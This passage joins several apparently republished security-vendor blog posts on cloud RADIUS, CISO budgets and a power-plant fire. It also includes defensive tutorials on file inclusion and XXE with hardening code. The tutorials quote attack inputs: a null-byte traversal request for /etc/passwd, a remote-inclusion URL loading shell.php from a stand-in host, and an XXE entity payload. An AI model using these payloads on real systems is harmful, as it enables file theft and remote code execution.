
The Benefits of Moving Your RADIUS Server to the Cloud

Remote Authentication Dial-In User Service (RADIUS) authenticates and authorizes users trying to access a network by sending client access requests to a RADIUS server. The requests carry data such as the client’s username, password, port, and IP address, which the server checks against its user database for a match.

Leveraging RADIUS in your organization can strengthen your network security through centralized authentication and enhanced access controls. RADIUS servers are useful in many contexts, and a cloud-hosted RADIUS server can serve both WiFi access points and VPNs. By shifting to the cloud, RADIUS becomes more centralized within an organization’s core infrastructure.

The Advantages of Shifting RADIUS Server to the Cloud:

  • Added Security Benefits: A RADIUS server supports unique per-user credentials, which mitigates the threat of attackers infiltrating a WiFi network, since there is no single shared password used by several people.
  • Reduces the Hassle of Password Management: With unique credentials, a shared password does not need routine changing since every person manages their own. This saves time for IT administrators and eliminates the need for users to routinely update passwords.
  • Benefits Enterprise Networks with Multiple IT Admins: With a RADIUS server, it is extremely easy to control who and what has access, and when. Only authorized users can access sensitive information within a large organization’s network. VLAN segmentation through RADIUS attributes is a critical characteristic of RADIUS-driven networks.
  • Centralizes User and System Authentication: IT admins have only one contact point for managing users’ passwords, authentication, and authorization.
  • Easy Integrations with Existing Infrastructure: Modern RADIUS servers can easily integrate with any IT infrastructure currently in place. This flexibility means that you can use cloud RADIUS with infrastructure you have already set up, just as you could with a traditional setup.
  • Easy Activation and Deactivation: Cloud RADIUS servers are typically operated by a third-party provider, which reduces the workload for resource-light IT teams: admins simply point their network devices at the cloud RADIUS endpoints for authentication.
  • Secure VPN Authentication: Not only does RADIUS authentication securely connect users to WiFi networks, but it also works with VPNs. This ensures that only authorized users can access your network through your company VPN.
  • Enables 802.1X: 802.1X uses the Extensible Authentication Protocol (EAP) to carry authentication packets between the two parties. EAP is highly versatile, making it easy to add to an existing infrastructure.

Cloud-based RADIUS servers can serve as a great authentication solution that provides immense benefits without the hassles of managing and maintaining on-prem hardware.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

File Inclusion Vulnerabilities (LFI and RFI)

There are two types of File Inclusion Vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

These inclusion vulnerabilities are very similar to the Directory Traversal attack. I will explain the differences in the section below.

To perform this attack, the attacker needs to target an application that has logic for saving files and logic for retrieving them in the UI. The saving logic is crucial because it provides a way to place a file on the target server and then have it included by a script. In theory, the retrieval logic is not needed to perform the attack. Still, it is very important, because the attacker can intercept the request, investigate it, and learn which information helps in performing the attack.

We will manipulate the parameter in URL, as we did before in one of the articles when explaining the Directory Traversal attack. 

LFI loads local files such as “/etc/passwd”; RFI, on the flip side, can load a file from an external source outside the server.

*Why do you always find examples of these attacks using the plain text file “passwd”?

This file is handy because it contains information such as the list of registered users (user id, group id, home directory, etc.), and it can be accessed because it is readable by everyone, which makes it possible to map user ids to user names.

Difference between Directory Traversal and File Inclusion Vulnerabilities

In the Directory Traversal article, I gave simple examples of this attack and some prevention tricks you can use with JS, Angular, or C# libraries.

File Inclusion and Directory Traversal look very similar, but they have one huge difference: the possibility of executing files within the attack.

File inclusion vulnerabilities allow you to load and execute a file in the application. A directory traversal attack, on the other hand, only reads files.

I will give an example later in the text, but here I am just going to explain one scenario so you can better understand:

In the application, we can browse to a file and save it. When we investigate the GET request that returns the file, we see that the URL changes because it contains the name of the file. That means we can manipulate the name and supply, in its place, a path to a specific file on our own machine. That file can be a .txt, a PowerShell script (.ps1), etc. It would typically contain a script with malicious code, which is then executed on the target server. That is an example of a Remote File Inclusion attack!

How to test if your application has File Inclusion Vulnerabilities?

It is essential to test the code while developing. In this case, the developer needs to test it themselves, not just with some of the tools I mentioned in the Directory Traversal article. I also think it is important to check whether the attacker can access folders and files. And even if folders are restricted using permissions, the developer should test whether those restrictions can be easily bypassed.

Summary:

First step: to prevent this attack, you should find out whether your application allows files to be accessed (whether it has file inclusion vulnerabilities).

Second step: Check if the attacker can access the file even with folder/file permissions.

Examples of Local File Inclusion

For example, we have an application with an input field for entering the file’s name; by clicking on the Include button, the file is uploaded.

When you successfully upload the file, and you preview it, the URL will change to this:

http://test.com/testController?file=test.php

The attacker starts by exploring how the code is written to understand the used logic and find information where the file is saved. 

We can start by “making a mistake” when trying to import a file, because some warning or error will occur. The warning or error usually arrives in the response to an HTTP request. Each HTTP request is visible in the browser’s Developer Tools, where you can see the headers, the body, the URL it hits, etc. The body carries the payload you send, for example the file we are trying to upload.

From there you can easily work out the structure of the payload and what the API expects, so if you want to replace it with a malicious one, you know what shape it needs to have to get through.

*Note: You probably know that the structure of the object you send to the API from the UI needs to match the object the API expects. If not, the mapping fails and the request will not even reach the controller in the API.

So, you first want to provoke a mistake and analyze the error or warning message that is returned.

As you can guess, we need to focus on error/warning messages.

We should try to catch all the exceptions and replace them with custom, user-friendly messages. With that in place, you should avoid returning information that would expose sensitive details of the API, for example which method is used, what input is expected, file paths, etc.

In one of the examples I found on the internet, I saw that even this message can be retrieved:

What information does this warning message uncover?

First, this is a PHP application that uses the include method. As W3Schools states: “The include (or require) statement takes all the text/code/markup that exists in the specified file and copies it into the file that uses the include statement.”

The code tries to include a file named “hi” after appending the extension “.php”. The file location is also visible: “/var/www/html”.

So, as you see, this warning uncovers a lot of information:

  • the method used, so we know the logic of the application

  • the extension is appended automatically, so we would need to bypass that

  • the file path, so we know how many “../” we need or how we will “walk” through the folders. You have probably already guessed that at this stage we can use the Directory Traversal technique “../”.

What would the attacker use to read the registered users in /etc/passwd?

http://test.com/testController?file=../../../../etc/passwd%00

%00 is a URL-encoded null byte; it is used so that all characters after it, including the appended extension, are ignored.

If this passes and passwd does not have restricted permissions, the content will be readable; if permissions are in place, they are our next focus.

It is great that we did not forget to add permissions to files containing sensitive data, but it is very important to try to bypass those permissions and see how securely we implemented them.

To test that, we could craft test requests with Burp Suite, curl, or Postman.

We should pay attention to testing credentials or cookies because sensitive data can be manipulated there.

In one of the following articles, I will cover best practices for implementing good credential and session management to avoid a problem with broken authentication. 

Examples of Remote File Inclusion

For this type of attack, the file name that gets saved is a path to a malicious script on the attacker’s server.

This is an example of a URL that points at a malicious script on some domain.com site:

http://test.com/testController?file=http://domain.com/shell.php

So, this saves the path, and when the path is called, it executes shell.php: a malicious script whose code targets the system to extract data.

*Focus on validating inputs in UI, so the malicious input parameters don’t even get to the API!
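As an added example (not code from the original post), here is a Python gate for the `file` parameter that covers both the LFI request discussed above (file=../../../../etc/passwd%00) and the RFI request (file=http://domain.com/shell.php). It decodes the value, rejects null bytes, URL schemes and path separators, and only then consults an allowlist of includable pages. The include root /var/www/html is the one visible in the warning message discussed earlier; the allowlist and the sample requests are constructed for this example.

```python
"""Added example (not from the original article): validating the ``file``
parameter before it ever reaches an include/require call.

Assumptions, all constructed for this example: the include root is the
/var/www/html path visible in the article's warning message, the allowlist
of includable pages is invented, and the request URLs mirror the article's."""
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

INCLUDE_ROOT = "/var/www/html"
ALLOWED_PAGES = frozenset({"test.php", "home.php", "about.php"})


class UnsafeIncludeError(ValueError):
    """The requested file must not be included."""


def safe_include_target(file_param: str,
                        root: str = INCLUDE_ROOT,
                        allowed: frozenset = ALLOWED_PAGES) -> str:
    """Return the absolute path the application may include, or raise.

    The checks are layered on purpose: the allowlist alone would be enough,
    but each earlier check names the specific trick it stops, which makes
    the rejection reason useful in logs without echoing the input back.
    """
    decoded = unquote(file_param)            # %00 -> "\x00", %2e -> "."
    if "\x00" in decoded:
        raise UnsafeIncludeError("null byte in file parameter")
    if urlsplit(decoded).scheme:             # http://, ftp://, php://, data:
        raise UnsafeIncludeError("remote or wrapper location not allowed")
    if "/" in decoded or "\\" in decoded:    # no directory components at all
        raise UnsafeIncludeError("path separators not allowed")
    if decoded not in allowed:
        raise UnsafeIncludeError("file is not on the include allowlist")
    target = posixpath.normpath(posixpath.join(root, decoded))
    if not target.startswith(root.rstrip("/") + "/"):   # belt and braces
        raise UnsafeIncludeError("resolved path escapes the include root")
    return target


def audit_request(url: str) -> str:
    """Classify one request URL of the ``?file=`` form used in the article.

    Returns "ok" when the parameter would be accepted, otherwise the reason
    it is rejected. Useful both as the server-side gate and for replaying
    captured request logs to see which ones would have got through.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("file", [])
    if len(values) != 1:
        return "missing or repeated file parameter"
    try:
        safe_include_target(values[0])
    except UnsafeIncludeError as exc:
        return str(exc)
    return "ok"


# Constructed sample requests, modelled on the URLs in the article.
SAMPLE_REQUESTS = [
    "http://test.com/testController?file=test.php",
    "http://test.com/testController?file=../../../../etc/passwd%00",
    "http://test.com/testController?file=http://domain.com/shell.php",
    "http://test.com/testController?file=test.php&file=home.php",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(f"{audit_request(request):40s} {request}")
```

Run stand-alone, the script prints a verdict per sample request. The allowlist is the real control; the earlier checks exist so that the log entry says which trick was attempted (null byte, remote location, traversal) instead of only "not allowed", and so that a future loosening of the allowlist does not silently reopen those cases.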

Important reminder: use trusted third-party libraries for validation

If you check out the logic in libraries, you can see how to expand it to cover some specific cases for your application.

The modification can be done by creating a wrapper around the library’s class, or even by writing a script with extended logic.

Also, always check and upgrade the version of third-party libraries!

Conclusion

Prevention is very important to avoid these vulnerabilities, but testing is equally important.

If you are a software developer, you know that to be a good developer you must develop testing skills as much as coding skills.

You should use all available tools to screen for these types of vulnerabilities, but remember that you should trust your own knowledge the most!

Don’t forget to give the code to testers because the person writing the code can often overlook some cases. Mostly because while coding and trying to write secure code, they might assume that the attacker will attack in a certain way.

If you are a developer, the best practice is to always be familiar with new attack techniques.

In the end, secure code is the cheapest code!

#LFI #RFI #vicarius_blog

Cover photo by Kevin Ku


About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

How CISOs Can Stretch IT Security Budgets

The global annual cost of cybercrime is now an eye-watering $6 trillion. To put this into perspective, if cybercrime were a country, it would be the world’s third-largest economy after the US and China.

The cybercrime landscape has changed dramatically over the last decade. For example, ransomware was 57 times more destructive in 2021 than in 2015. The average cost of data breaches continues to rise every year. Moreover, the COVID-19 pandemic has changed how we work – more people are working remotely and from their own devices. This means cybersecurity teams have less insight into what employees are doing, and as a result, Shadow IT is becoming an even bigger problem.  

But how do chief information security officers (CISOs) navigate this increasingly hostile cyber threat landscape in a world where IT security budgets are tightening? With the US economy on the brink of a recession, cybersecurity budgets are tighter than ever. As a result, CISOs need to do more with less and develop a new and robust IT security strategy. That’s what we’re going to be diving into today.  

Ways to Stretch IT Security Budgets

1. Get More From Your Existing Tools

As the number of data breaches has skyrocketed over recent years, so have the technologies we deploy to stop them. For example, the average small business uses between 15 and 20 IT security tools, while medium-sized companies use 50 to 60, and enterprises use over 130 IT security tools. But how many of these companies are using their cybersecurity tools to their full potential?  

It’s a good idea to evaluate and consolidate your existing cybersecurity tools. For example, you might find that one tool can do everything another tool can do, or that you have a significant overlap in functionality across your arsenal. Getting rid of redundant tools not only saves money but also makes it easier to manage your cyber threat landscape. In other words, the more tools you have, the higher the probability of misconfigurations, patch management issues, and privilege and password management issues.

If you’re unsure just how far specific tools can go, you can ask the vendor for free or low-cost training to help fill in the gaps. Moreover, opening a line of discussion with your IT security vendors can also give you valuable information about what tools can offer heightened protection in the future. For example, you might find that one vendor is imminently about to release a new security feature that addresses a critical security concern in your industry.  

2. Choose Automated Tools

Automation has come a long way in cybersecurity, and it’s even more potent today with cutting-edge technologies like artificial intelligence and machine learning. With automation technology, IT security systems can sense, study, and stop cybersecurity threats automatically and before they escalate into a fully-fledged security incident. Today we see automation, AI, and machine learning deployed across security tools, including network security tools like Network Penetration Testing tools, Network Intrusion Detection Systems, and in other areas like vulnerability management, security logging, and Security Information and Event Management (SIEM).  

However, it’s critical to note that most cybersecurity experts don’t recommend leveraging automation to replace staff. Automation can boost efficiency and reduce human errors, but it’s no match for a highly skilled security professional. Essentially, by investing in automation, your existing cybersecurity staff become freed up to work on more complex tasks.  

3. Make Your Case for More Funds

Getting the funds you need to provide effective network security can be challenging. As a CISO, you’re competing with other senior-ranking IT staff for your fair share of the IT budget.  

According to a Deloitte report, around 6% to 14% of the IT budget goes to cybersecurity for the average business. So, if your team is getting significantly less than this, you might want to consider why. Are your budget decision-makers unconvinced of the need for cybersecurity? Do they have doubts about its effectiveness? And what can you do to prove that more upfront investment is substantially cheaper than a costly cyber attack? 

When you go into budget discussions, you must have a good grip on the data and any upcoming concerns in the industry. For example, during COVID-19, we saw a massive spike in ransomware attacks. And today, Crime-as-a-Service (CaaS) tools are dramatically lowering the barrier to entry for would-be hackers. So much of cybersecurity is about anticipating your opponent’s move and being prepared before they strike. This means you have to pay attention to emerging trends just as much as current threats when detailing your cybersecurity budget.  

4. A More Creative Approach to Staffing

Employees will always be a dominant part of your IT security strategy, but they also make up a significant percentage of organizations’ IT security budgets. So, how do you ensure you’re spending your money wisely while getting the IT security skills you need? 

First, you need to set your sights beyond your local area. Skilled cybersecurity professionals are in high demand, but the talent pool is small. Moreover, the cybersecurity skills gap continues to widen every year. In the era of remote working, CISOs have never been in a better position to recruit security workers from different geographical areas.   

And on the point of the cybersecurity skills gap, companies need to be more creative in combating this issue. What do we mean by this? Well, many HR teams have a poor understanding of the skills or qualifications needed to be an effective IT security worker. As a result, they might filter out candidates without specific qualifications despite this being easy to remedy with training.  

You can recruit people with practical skills or look for people with these skills in-house. For example, technical aptitude, problem-solving skills, attention to detail, communication skills, fundamental computer forensics skills, and a desire to learn are crucial skills that often take a back seat to a specific certification in the recruiting process.  

Additionally, you might find it’s more cost-effective to outsource parts of your cybersecurity function than to build the perfect team in-house.

Final Thoughts on IT Security Budgets

The consequences of not investing in robust IT security are clear – costly fines, successful data breaches, and hefty reputational losses. CISOs know this, and so does the wider IT function. However, with an economic downturn looking ever more likely, CISOs will have to get more creative with their cybersecurity budgets or risk being left even more vulnerable.


Did Iranian Hackers Cause The Fire At An Israeli Power Plant?

Almost immediately after a fire broke out in an active power plant in southern Israel on July 14, 2022, an Iranian hacking group claimed responsibility. While it’s understandable why the group, which goes by the name #Altahrea, would want to boost their hacker profile by saying they caused the fire, there is ample evidence that they actually had nothing to do with it. 

The Orot Yosef power plant, part of the Edeltech group, is located in Ramat Hovav, Israel and has been in operation since 1989. 

Orot Yosef Power Plant

To understand why we believe this fire was not the work of hackers, let’s take a look at how this plant operates and what might have happened to cause the fire. (SCADAfence’s security team research lead Yossi Reuven also spoke about the attack to Techmonitor.ai)

Gas turbines can be used in conjunction with steam boilers by passing hot gases from the boiler through a gas turbine to produce mechanical drive for electricity generation. This combined arrangement is commonly referred to as “cogeneration.” Cogeneration is thermodynamically the most efficient method for generating electrical power, and it is the method used by the Orot Yosef facility.

Why is this important? Understanding the process used by a facility is crucial to determining what event took place. Gas turbines require a correctly ratioed air-to-fuel mixture to operate. Running a turbine too rich or too lean (with too much or too little air in the mixture) can cause significant damage to the turbine. This means that if someone with malicious intent were able to compromise the air handling and run the turbine at maximum output with a lean mixture, there is a good chance of detonation, overheating, loss of power, and damage to the turbine. These issues would all relate to the turbine housing and would be a far more catastrophic event.

We know that GE turbines were purchased and installed in the plant in 1989 as you can see in the image below from the Global Energy Observatory. (The GEO is a publicly available database of global energy information)

GEO entry for Orot Power Plant

The Power Plant Fire 

Shortly after the fire began, the Iranian hacker group #Altahrea posted a photo on Telegram of a fire that looks to have started in the building known as the “Air Filter House”.

Most of the technology that resides inside the filter house is there to detect if the system is clogged. When a clog happens, it triggers the shutdown of the turbine to protect it from too much debris passing through the filter system, which can shorten the lifespan of the turbine.

Fire is a major risk for filter houses that have poor maintenance cycles. If filters are not replaced routinely, particulates and debris build up and all it takes for the filter cartridge pairs to go up in flames is a single spark. 

Based on open-source intel, it is likely that this facility is running an Electrostatic Precipitator.

Power plant information from open source database

An Electrostatic Precipitator (ESP) is typically used for pollution control to remove dirt from flue gases in exhaust systems. Because this facility can use diesel as a secondary source of power generation, it is possible that an ESP is present.

Another detail that provides relevant information is a redacted picture of Shodan.io’s Industrial Webcrawler revealing a Phoenix Contact EMpro PLC running a Webserver exposed to the internet as shown below.

Shodan.io shows information on the Phoenix Contact EMpro

The EMpro is used to measure voltages and currents in a power supply system. The measurements are used primarily to manage critical load balancing across a system, not for any critical process control of the filter house. If the device were compromised, it would only allow an individual to carry out relatively small actions, and only if the device had its Digital Output wired up.

This all raises the question: is it possible that a remote monitoring device was compromised in a way that allowed an adversary to trigger a discharge inside the filter house, which then ultimately started a fire? Possibly. However, it would require ideal conditions, and it would also require a lapse in maintenance with a buildup of debris. I would expect the same level of probability if someone discarded a still-lit cigarette and the filter house drew it into the filter cartridge stage. In this case, that is a more likely cause of the fire, and not the Iranian hackers who claimed credit.

To learn more about how the SCADAfence Platform can protect your OT network request a demo today.


About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

XML External Entity (XXE) Attack

In this article, I will write about the XML External Entity attack. For this attack to occur, the application must have logic for parsing XML input.

This injection happens when the XML parser is weakly configured. A successful attack means the attacker is able to view files on the application server and interact with the backend. An XXE vulnerability can also be used to perform server-side request forgery (SSRF) attacks, denial of service (DoS) such as the Billion Laughs attack, and more.

What are XXE types?

There is no strict classification of XXE attacks, but we can divide them into two types: in-band and out-of-band (blind).

· In-band attacks are more common than out-of-band ones. In this case, the attacker receives an immediate response to the XXE payload.

· Out-of-band, or so-called blind XXE: there is no immediate response. This type involves creating an external Document Type Definition, and the XML parser needs to make an additional request to an attacker-controlled server.

In which cases can an attacker perform this injection?

· In old applications where the version of SOAP is lower than 1.2

· Applications where users are logged in based on their sessions via SAML (the single sign-on (SSO) login standard). The chances of this attack are very high here because SAML uses XML for identity assertions

· Where XML input or XML uploads built from untrusted data are added to XML documents and then parsed by an XML processor.

· There is a high risk when Document Type Definitions (DTDs) are enabled

When would an application parse XML?

XML is often used in both frontend and backend web development.

Examples:

The frontend side of the application can request, for example, an XML file from the API and build and present a UI form based on the data in the XML. There may then be an option to add a new field to the form and save the changes; afterward, the XML input is added to the XML document.

On the backend, XML is used to transfer data in a standard format. In mobile development, Android applications also use it to define layouts and store configuration.

On the OWASP site, you can find more examples of XXE attacks. PortSwigger has a nicely explained example of this attack:

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application’s response to include the contents of the file:

Invalid product ID:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

List of preventions for XXE

  • Use JSON instead of XML and avoid serialization of sensitive data
  • As mentioned before, this attack can happen easily when the application is using SOAP < 1.2, so upgrade to a higher version
  • Implement XSD validation (“XML Schemas”) in your application for all XML inputs
  • Patch or upgrade all XML libraries
  • Use SAST tools to check for XXE vulnerabilities
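The stock-check payload quoted above is exactly the kind of input a hardened parser should refuse outright. The following C# is an added example, not code from the original article or from PortSwigger: it shows the .NET XmlReaderSettings a practitioner would use, where DtdProcessing.Prohibit rejects any DOCTYPE and a null XmlResolver guarantees that nothing is fetched from disk or the network even if DTD processing were later relaxed. The two sample documents and the productId value are constructed for this example.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example, not from the original article: a hardened XmlReader
// configuration that refuses any DOCTYPE, so the stock-check payload quoted
// in the article is rejected before an entity could ever be resolved.
public static class HardenedStockCheckParser
{
    // Constructed sample: the XXE payload shown in the article.
    public const string XxePayload =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
        "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n" +
        "<stockCheck><productId>&xxe;</productId></stockCheck>";

    // Constructed sample: what a legitimate stock-check request looks like.
    public const string LegitimatePayload =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
        "<stockCheck><productId>381</productId></stockCheck>";

    public static XmlReaderSettings SecureSettings()
    {
        return new XmlReaderSettings
        {
            // Any <!DOCTYPE> makes the reader throw XmlException immediately.
            DtdProcessing = DtdProcessing.Prohibit,
            // Never resolve external resources (DTDs, schemas, entities).
            XmlResolver = null,
            // Defence in depth: bound entity expansion should DtdProcessing ever be relaxed.
            MaxCharactersFromEntities = 1024
        };
    }

    // Returns the productId text of a stock-check request.
    // Throws XmlException for any document that carries a DOCTYPE.
    public static string ReadProductId(string xml)
    {
        var doc = new XmlDocument { XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(xml), SecureSettings()))
        {
            doc.Load(reader);
        }
        return doc.SelectSingleNode("/stockCheck/productId")?.InnerText;
    }

    public static void Main()
    {
        Console.WriteLine("Accepted productId: " + ReadProductId(LegitimatePayload));
        try
        {
            ReadProductId(XxePayload);
            Console.WriteLine("BUG: XXE payload was accepted");
        }
        catch (XmlException ex)
        {
            // Logging the rejection gives the SOC a detection signal for XXE attempts.
            Console.WriteLine("Rejected: " + ex.Message);
        }
    }
}
```

The rejection happens inside the reader, before the document is built, so neither the entity nor the file it points at is ever touched; logging these XmlException rejections at the application boundary is a cheap detection signal for XXE probing.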

How to prevent XXE if you are using SAML?

The SAML language is used to construct authorization statements whose authenticity is protected by an XML digital signature applied over the statements.

Many attacks happen because of wrong assumptions made by developers, for example that the token is always well-formed XML compliant with the SAML schema.

Developers may assume that a SAML document has just one Assertion tag (a properly formed one does). Relying on that, they validate only the first element returned when searching the XML document for elements by tag name.

To get the list of nodes, the DOM “getElementsByTagName” method can be used:

NodeList xmlNodes = doc.getElementsByTagName("saml:Assertion");

xmlNodes is assigned the list of elements in the document whose tag name is “saml:Assertion”.

Because developers assume this is a properly formed SAML document with one Assertion tag, they take the first element and validate it:

Element firstElement = (Element) xmlNodes.item(0);

As you can guess, this is not the proper way to validate the tag, because the attacker can also assume that developers used this approach. In that case, the attacker can insert a malicious assertion before the original one, and it will never be detected.

With the same logic, some developers use “getElementsByTagNameNS”, but the result is the same: a malicious assertion inserted as the first element goes undetected.
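The fail-closed alternative to taking item(0) is to require exactly one Assertion and reject the whole response otherwise. The following C# is an added example, not code from the original article: it loads the response with DTDs prohibited, counts saml:Assertion elements with a namespace-aware XPath query, and returns the single element for signature verification. The two sample responses, their IDs and NameID values are constructed for this example, and signature verification itself (System.Security.Cryptography.Xml.SignedXml) is deliberately left as the next step.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example, not from the original article: require exactly one
// <saml:Assertion> instead of trusting whichever one appears first.
public static class SamlAssertionCheck
{
    public const string SamlNs = "urn:oasis:names:tc:SAML:2.0:assertion";
    public const string SamlpNs = "urn:oasis:names:tc:SAML:2.0:protocol";

    // Constructed sample: a response with a single assertion.
    public const string SingleAssertionResponse =
        "<samlp:Response xmlns:samlp=\"" + SamlpNs + "\" xmlns:saml=\"" + SamlNs + "\">" +
        "<saml:Assertion ID=\"_a1\"><saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject></saml:Assertion>" +
        "</samlp:Response>";

    // Constructed sample: the shape the article warns about, a second assertion placed first.
    public const string DoubleAssertionResponse =
        "<samlp:Response xmlns:samlp=\"" + SamlpNs + "\" xmlns:saml=\"" + SamlNs + "\">" +
        "<saml:Assertion ID=\"_second\"><saml:Subject><saml:NameID>mallory</saml:NameID></saml:Subject></saml:Assertion>" +
        "<saml:Assertion ID=\"_a1\"><saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject></saml:Assertion>" +
        "</samlp:Response>";

    // Parse with DTDs prohibited and no resolver: a SAML response never needs a DOCTYPE.
    public static XmlDocument LoadSecurely(string xml)
    {
        var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
        // PreserveWhitespace keeps the signed bytes intact for later signature verification.
        var doc = new XmlDocument { PreserveWhitespace = true, XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            doc.Load(reader);
        }
        return doc;
    }

    // Returns the one assertion, or throws when the count is anything other than one.
    public static XmlElement GetSingleAssertion(XmlDocument doc)
    {
        var ns = new XmlNamespaceManager(doc.NameTable);
        ns.AddNamespace("saml", SamlNs);
        // Namespace-aware search over the whole document, not a prefix match on the tag name.
        XmlNodeList assertions = doc.SelectNodes("//saml:Assertion", ns);
        if (assertions.Count != 1)
        {
            throw new InvalidOperationException(
                "Expected exactly one saml:Assertion, found " + assertions.Count);
        }
        return (XmlElement)assertions[0];
    }

    public static void Main()
    {
        XmlElement ok = GetSingleAssertion(LoadSecurely(SingleAssertionResponse));
        Console.WriteLine("Accepted assertion " + ok.GetAttribute("ID"));

        try
        {
            GetSingleAssertion(LoadSecurely(DoubleAssertionResponse));
        }
        catch (InvalidOperationException ex)
        {
            Console.WriteLine("Rejected: " + ex.Message);
        }
    }
}
```

After this check, verify the XML signature over the returned element and confirm that the signature's Reference URI points at that element's ID. An extra Assertion anywhere in the response is grounds for rejecting the response as a whole, not for choosing one of them.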

Proper prevention would be:

· Parse the XML document and validate its structure against the supplied schema. Never allow automatic download of schemas from third parties; prefer local trusted copies. If possible, inspect the schemas and perform schema hardening, for example disabling wildcard types or relaxed processing statements.

· Validate the digital signature, which verifies the authenticity and integrity of the assertion embedded in the SAML document. This prevents forgery.

Most important when writing a schema is to describe the intended document’s structure precisely.

How to prevent XXE using XSD validation?

I will explain how to create a C# solution to validate XML data.

The most important reason to use XSD (XML Schema Definition) validation is that we want the sender and receiver to have the same “expectations” about the content. Using schemas, we describe the data exactly, so that both parties are clear about it.

Steps:

· Add an XML file to the project

When you add the XML file, you will just see the xml declaration:

<?xml version="1.0" encoding="utf-8" ?>

I will add a User object with the properties FirstName, LastName and Address, so the XML file would look like this:

· Create an XML Schema for this file

You will get an XML schema structure like this:

· Modify the XSD

Now you can modify the file and add validations for FirstName and Address. In this case, I just show how to add validations for these fields; they will of course not prevent the attack on their own, they only validate the length and the type of the mentioned fields.

· Validate the XML using the XSD

What am I doing in the code?

  • Getting the local path of the assembly so I can append the XML file name and the XSD file name to obtain their full paths
  • Creating the schema using XmlSchemaSet and XmlSeverityType, which are from System.Xml.Schema
  • Using XmlReader from System.Xml so I can create an XDocument, imported from System.Xml.Linq
  • After creating the document, I call its Validate method, passing the schema to validate against and the ValidationEventHandler method (I named it that), which throws an exception if the severity type is Error. All validation logic should go in this method.

This is just an example of how to create an XSD for an XML file and which libraries you can use for the validation.
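Since the article's XML, XSD and C# listings are not reproduced here, the following is an added, self-contained C# example of the four steps above (not the article's own code): a User schema with length restrictions on FirstName and Address, a ValidationEventHandler that throws on XmlSeverityType.Error, and XDocument.Validate from System.Xml.Schema. It embeds the schema and two sample documents as strings instead of reading files next to the assembly; the element names and the limits (50 and 200 characters) are constructed for this example.

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Linq;
using System.Xml.Schema;

// Added example, not from the original article: XSD validation of the User
// document with XmlSchemaSet, XDocument.Validate and a throwing handler.
public static class UserXsdValidation
{
    // Constructed sample schema: FirstName and Address are bounded strings,
    // LastName is left as a plain string.
    public const string UserSchema =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>" +
        "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" elementFormDefault=\"qualified\">" +
        "<xs:element name=\"User\"><xs:complexType><xs:sequence>" +
        "<xs:element name=\"FirstName\"><xs:simpleType><xs:restriction base=\"xs:string\">" +
        "<xs:minLength value=\"1\"/><xs:maxLength value=\"50\"/>" +
        "</xs:restriction></xs:simpleType></xs:element>" +
        "<xs:element name=\"LastName\" type=\"xs:string\"/>" +
        "<xs:element name=\"Address\"><xs:simpleType><xs:restriction base=\"xs:string\">" +
        "<xs:minLength value=\"1\"/><xs:maxLength value=\"200\"/>" +
        "</xs:restriction></xs:simpleType></xs:element>" +
        "</xs:sequence></xs:complexType></xs:element>" +
        "</xs:schema>";

    // Constructed sample documents: one valid, one with a 60-character FirstName.
    public const string ValidUser =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>" +
        "<User><FirstName>Ada</FirstName><LastName>Lovelace</LastName><Address>12 Example Street</Address></User>";

    public static readonly string InvalidUser =
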